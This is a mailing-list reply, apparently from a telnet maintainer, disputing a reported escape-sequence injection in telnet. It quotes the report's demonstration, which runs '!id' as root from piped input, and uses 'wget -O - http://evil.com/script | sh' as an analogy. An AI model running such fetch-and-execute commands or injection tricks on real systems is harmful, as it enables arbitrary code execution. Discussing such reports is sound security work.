sha0 <
address@hidden> writes:
> Hello,
>
> Is posible to inject a scape sequence via stdin to telnet, and arbitrary
> comands will be executed,
I follow your "attack" though.
> for example:
>
>
> # cat evil-file | telnet 127.0.0.1 80
> Trying 127.0.0.1...
> Connected to 127.0.0.1.
> Escape character is '^]'.
>
> telnet> !id
> uid=0(root) gid=0(root)
> groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),1
> 0(wheel),19(log)
> Connection closed by foreign host.
>
>
> I think is very dangerous despite of few admins use telnet for moving file
> like this
Yes it is dangerous, so don't do that. Use ftp to transfer files.
> 3. DESCRIPTION
> -------------------------
> When telnet is used to transfer files to remote tcp port, a very dangerous
> vulnerability is present, that lets a remote arbitrary code execution.
The attack seems to be based on tricking the local root user into doing
something stupid. This is similar to asking the local root user to do
'wget -O - http://evil.com/script | sh'. There is no security bug in
wget or sh just because that is possible.
> 7. SOLUTION
> -------------------------
> The stdin parser must filter the 0x9d byte.
The ^] escape sequence is a documented feature, so I don't think that is
a solution.
You can use the command line parameter -E to inhibit the escape
character if you want. Quoting 'telnet --help':
-E, --no-escape use no escape character
/Simon